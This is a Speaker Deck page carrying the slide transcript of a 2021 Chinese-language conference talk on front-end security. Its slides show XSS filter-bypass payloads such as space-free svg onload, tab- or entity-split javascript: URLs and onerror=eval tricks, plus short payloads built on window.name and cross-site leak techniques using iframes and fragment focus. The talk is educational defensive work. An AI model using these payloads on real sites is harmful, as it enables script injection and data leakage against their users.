Upgrade to Pro — share decks privately, control downloads, hide ads and more …

接觸資安才發現前端的水真深 - Modern Web 2021

Sponsored · Ship Features Fearlessly Turn features on and off without deploys. Used by thousands of Ruby developers.
Avatar for Huli Huli
October 15, 2021
Technology
2.6k
0

接觸資安才發現前端的水真深 - Modern Web 2021

接觸資安才發現前端的水真深 - Modern Web 2021

Avatar for Huli

Huli

October 15, 2021

More Decks by Huli

See All by Huli
從冷知識到漏洞,你不懂的 Web,駭客懂 - Huli @ WebConf Taiwan 2025
Avatar for Huli aszx87410
4
4k
ModernWeb 2018 - 輕鬆應付複雜的非同步操作:RxJS + Redux Observable
Avatar for Huli aszx87410
0
290
Attacking web without JS - CSS injection
Avatar for Huli aszx87410
0
3.5k
Front-end Security that Front-end developers don't know
Avatar for Huli aszx87410
2
6k
你懂了 JavaScript,也不懂 JavaScript - MOPCON 2021
Avatar for Huli aszx87410
3
1.3k
JSDC2020 - 用 API mocking 讓前端不再苦等待
Avatar for Huli aszx87410
0
1.4k

Other Decks in Technology

See All in Technology
NAB Show 2026 動画技術関連レポート / NAB Show 2026 Report
Avatar for CyberAgent cyberagentdevelopers
PRO
0
190
AWSシリコン最前線 〜AI時代のチップ選択を読み解く〜
Avatar for Hiroshi Tokoyo htokoyo
2
540
10倍の生産性を実現するAI駆動並列エージェントのすべて
Avatar for 熊井悠 kumaiu
5
1.4k
日本 Fintech 未来予測レポート 2027〜2028年(オリジナル版)
Avatar for 8maki 8maki
0
2.1k
AI駆動開発を通して感じた、 AI時代のデザイナーの役割変化
Avatar for WHIsaiyo whisaiyo
2
2k
連合学習と機密コンピューティング
Avatar for LINEヤフーTech (LY Corporation Tech) lycorptech_jp
PRO
0
110
2026TECHFRESH畢業分享會 - 葬送的通靈師:化系統與用戶雜訊成行動訊號
Avatar for LINE Developers Taiwan line_developers_tw
PRO
0
920
Kubernetesにおける学習基盤とLLMOpsの概要
Avatar for ry ry
1
270
2026TECHFRESH畢業分享會 - AI 時代的人生存檔點
Avatar for LINE Developers Taiwan line_developers_tw
PRO
0
930
ルールやカスタム機能、どう活かす?ハンズオンで体感するIBM Bobの出力コントロール
Avatar for mu (Mizuho Uehara) muehara
1
140
【NRUG vol.18】なぜ多くのオブザーバビリティ導入は失敗するのか
Avatar for NRUG member nrug_member
0
110
AIエージェントが名古屋の猛暑からあなたを守る
Avatar for コロッケそば happysamurai294
0
100

Featured

See All Featured
Building Applications with DynamoDB
Avatar for Matt Wood mza
96
7.1k
The Mindset for Success: Future Career Progression
Avatar for Greg Gifford greggifford
PRO
0
360
Claude Code のすすめ
Avatar for schroneko schroneko
67
230k
Paper Plane
Avatar for Katie Cordina Lindsey katiecoart
PRO
1
51k
How To Speak Unicorn (iThemes Webinar)
Avatar for Michelle Schulp Hunt marktimemedia
1
480
DevOps and Value Stream Thinking: Enabling flow, efficiency and business value
Avatar for Helen Beal helenjbeal
1
230
Learning to Love Humans: Emotional Interface Design
Avatar for Aarron Walter aarron
275
41k
Leadership Guide Workshop - DevTernity 2021
Avatar for David Neal reverentgeek
1
300
Exploring the relationship between traditional SERPs and Gen AI search
Avatar for Ray Grieselhuber raygrieselhuber
PRO
2
4k
KATA
Avatar for Megan Lloyd mclloyd
PRO
35
15k
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
Avatar for Dan Newman danielanewman
231
23k
Between Models and Reality
Avatar for mayunak mayunak
4
330

Transcript

  1. 接觸資安才發現前端的⽔水真深 Huli @ Modern Web 2021

  2. About 上半年年:OneDegree 前端⼯工程師

  3. About 上半年年:OneDegree 前端⼯工程師 下半年年:Cymetrics 資安⼯工程師

  4. None

  5. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  6. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  7. XSS

  8. <script> alert(1) </script>

  9. <img src=x onerror=alert(1)>

  10. <svg onload=alert(1)>

  11. Q1 如果把 HTML 中的空格都拿掉 是否還可以⽤用屬性 XSS?

  12. Q1 如果把 HTML 中的空格都拿掉 是否還可以⽤用屬性 XSS?

  13. <svg onload=alert(1)>

  14. <svg/onload=alert(1)>

  15. Q2 如果禁⽌止使⽤用 on 開頭的屬性, 是否還能 XSS?

  16. Q2 如果禁⽌止使⽤用 on 開頭的屬性, 是否還能 XSS?

  17. <iframe/ src="javascript:alert(1)">

  18. Q3 如果把 javascript 開頭的值都濾掉, 是否還能 XSS?

  19. Q3 如果把 javascript 開頭的值都濾掉, 是否還能 XSS?

  20. <iframe/ src="java\tscript:alert(1)">

  21. Q4 如果去除 tab 跟空⾏行行以後去掉 javascript, 是否還能 XSS?

  22. Q4 如果去除 tab 跟空⾏行行以後去掉 javascript, 是否還能 XSS?

  23. <iframe/ src="javascript:alert(1)">

  24. <iframe/ src="&#106avascript:alert (1)">

  25. Q5 如果去除 src 屬性, 是否還能 XSS?

  26. Q5 如果去除 src 屬性, 是否還能 XSS?

  27. <a/ href="javascript:alert(1)">

  28. <script> alert(1) </script>

  29. <script> alert`1` </script>

  30. onerror=alert;throw 1

  31. onerror=eval;throw "=alert\x281\x29"

  32. onerror=eval;throw "=alert\x281\x29" Uncaught 123

  33. onerror=eval;throw "=alert\x281\x29" Uncaught=123

  34. onerror=eval;throw "=alert\x281\x29" Uncaught=alert(1)

  35. None

  36. 字數限制

  37. <svg/onload=> 13 字

  38. 利利⽤用現有資訊

  39. <svg/ onload= eval(`'`+location)> 13 + 18 = 31 字

  40. a.com#';alert(1) `'` + location => 'a.com#';alert(1)

  41. <svg/ onload= eval(`'`+document.URL)> 13 + 22 = 35 字

  42. <svg/ onload= eval(`'`+document.URL)> 13 + 22 = 35 字 9

    個字

  43. <svg/ onload= eval(`'`+URL)> 13 + 13 = 26 字

  44. None
  45. None

  46. Q6 name = 123 typeof name === "number"

  47. Q6 name = 123 typeof name === "number"

  48. example.com window.name

  49. huli.tw window.name

  50. <svg/ onload= eval(name)> 13 + 10 = 23 字

  51. https://tinyxss.terjanq.me/

  52. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  53. Agenda 1. 繞過各種限制 2. Cross site leaks (XS leak) 3.

    其他你不知道的功能

  54. Download 請輸入要搜尋的使⽤用者名稱 example.com/download

  55. Download 請輸入要搜尋的使⽤用者名稱 查無使⽤用者 example example.com/download?q=example

  56. Download 請輸入要搜尋的使⽤用者名稱 a example.com/download?q=a

  57. Download 請輸入要搜尋的使⽤用者名稱 a

  58. 然後呢,我們能做什什麼?

  59. Download 請輸入要搜尋的使⽤用者名稱 iframe example.com/download huli.tw

  60. Download 請輸入要搜尋的使⽤用者名稱 iframe example example.com/download?q=example huli.tw

  61. Download 請輸入要搜尋的使⽤用者名稱 iframe example iframe.contentWindow.origin example.com/download?q=example huli.tw

  62. Download 請輸入要搜尋的使⽤用者名稱 iframe a iframe.contentWindow.origin example.com/download?q=a huli.tw

  63. None

  64. example.com/users/123 David id=message 傳送訊息

  65. example.com/users/210 Peter id=add 加入好友

  66. 然後呢,我們能做什什麼?

  67. example.com/users/123 David id=message 傳送訊息

  68. example.com/users/123#message David id=message 傳送訊息 focus

  69. iframe example.com/users/123#message huli.tw David id=message 傳送訊息

  70. None

  71. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  72. example.com/files example.com/blog 上傳各種檔案 放各種⽂文章

  73. example.com/files example.com/blog path: /files path: /blog 上傳各種檔案 放各種⽂文章

  74. example.com/files example.com/blog path: /files path: /blog 放各種⽂文章 <script>
 alert(1)
 </script>

    files/xss.html

  75. example.com/files example.com/blog path: /files path: /blog 放各種⽂文章 <script>
 alert(1)
 </script>

    files/xss.html ?
  76. None
  77. None

  78. example.com <embed src=/pdf?token=u7Dh3 ……….

  79. example.com <embed src=/pdf?token=u7Dh3 ………. <script>
 alert(1)
 </script>

  80. example.com <embed src=/pdf?token=u7Dh3 ………. <script>
 alert(1)
 </script> ?

  81. None
  82. None

  83. Agenda 1. 繞過各種限制 2. side channel attack 3. 其他你不知道的功能

  84. 資料來來源 1.https://tinyxss.terjanq.me/ 2.https://xsleaks.dev/ 3.LINE CTF 2021 4.DiceCTF 2021 5.zer0pts CTF

    2021

  85. google: cymetrics blog